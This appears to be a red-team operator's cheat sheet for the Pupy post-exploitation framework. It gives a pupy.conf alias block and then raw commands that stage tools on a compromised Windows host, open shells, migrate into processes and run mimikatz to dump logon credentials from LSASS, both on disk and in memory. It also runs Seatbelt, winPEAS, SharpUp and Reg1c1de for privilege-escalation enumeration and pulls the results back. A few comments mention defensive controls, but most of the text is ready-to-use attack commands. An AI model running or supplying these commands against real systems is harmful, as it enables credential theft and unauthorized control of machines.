Project home: https://github.com/n1nj4sec/pupy
Modify pupy.conf: custom aliases are added under the section that starts with the [aliases] header, for example:
# Operator-defined aliases: each entry maps a short name (left) to the pupy
# command line it stands for (right).
# NOTE(review): some values carry a leading `run` (winshell, mkadmin) and
# others do not (shell, exec, info) -- confirm which form alias expansion expects.
[aliases]
info = get_info
pyexec = pyexec
exec = shell_exec
shell = interactive_shell
winshell = run interactive_shell
kill = process_kill
mount = drives
# Tool staging: the archive is uploaded from the operator host and (per the
# unzip-* aliases below) presumably extracted from c:\windows\temp, optionally
# into c:\admin. Both directories are on-disk artifacts that host forensics
# and file-creation telemetry can key on.
upload-priv = run upload "/home/kali/tools/win-priv/winpriv.zip"
mkadmin = run mkdir "c:\admin"
h = help
# NOTE(review): winshell is already defined above with the same value; this
# entry is redundant, and a strict INI parser may reject the duplicate key.
winshell = run interactive_shell
unzip-priv = run zip -u "c:\windows\temp\winpriv.zip"
unzip-priv-admin = run zip -u "c:\windows\temp\winpriv.zip" -d "C:\admin"
# Seatbelt runs redirect their report to a text file under c:\windows\temp;
# dfull / dall download those same files.
seatbelt-full = run --b shell_exec "c:\admin\seatbelt.exe all full > c:\windows\temp\seatbelt_full.txt"
seatbelt-all = run --b shell_exec "c:\admin\seatbelt.exe all > c:\windows\temp\seatbelt_all.txt"
dfull = run download "c:\windows\temp\seatbelt_full.txt"
dall = run download "c:\windows\temp\seatbelt_all.txt"
# mimikatz sekurlsa::logonpasswords reads logon credentials from LSASS memory.
# The output is redirected to plain-text files under c:\windows\temp, which
# leaves any recovered credentials on disk in clear text.
# Defensive controls that apply here: LSA protection (RunAsPPL), Credential
# Guard, and alerting on process access to lsass.exe.
mimi32 = run --b shell_exec "c:\admin\mimikatz\win32\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\windows\temp\mimi32.txt"
mimi64 = run --b shell_exec "c:\admin\mimikatz\win64\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\windows\temp\mimi64.txt"
gen -O windows -A x86 -f client
ps -i
migrate <pid>
sessions
Select the session to interact with:
session -i <id>
run interactive_shell
shell
run -f 3 pyshell
run download 'C:\Windows\System32\cmd.exe'
run upload '/home/kali/tools/win-priv/winPEAS32.exe'
run memory_exec /home/kali/tools/win-exe/mimikatz/win32/mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
run memory_exec /home/kali/tools/win-exe/mimikatz/win64/mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
rdesktop -r 0
run memory_exec /home/kali/tools/win-priv/seatbelt.exe
run --b shell_exec "c:\windows\temp\seatbelt.exe all > c:\windows\temp\seatbelt_all.txt"
run download "c:\windows\temp\seatbelt_all.txt"
run upload "/home/kali/tools/win-priv/seatbelt.exe"
run --b shell_exec "c:\admin\mimikatz\win32\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\admin\mimi32.txt"
Reg1c1de: export writable registry keys (HKLM and HKCU):
run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hklm.csv -r=HKLM -e"
run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hkcu.csv -r=HKCU -e"
run download "c:\admin\hklm_HKEY_LOCAL_MACHINE.csv"
run download "c:\admin\hkcu_HKEY_CURRENT_USER.csv"
run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hkcu.csv -r=HKCU -e"
run --b shell_exec "c:\admin\sharpup.exe > C:\admin\sharpup.txt"
run download "C:\admin\sharpup.txt"
run --b shell_exec "C:\admin\winpeas.bat > c:\admin\winpeas_output.txt"
run download "c:\admin\winpeas_output.txt"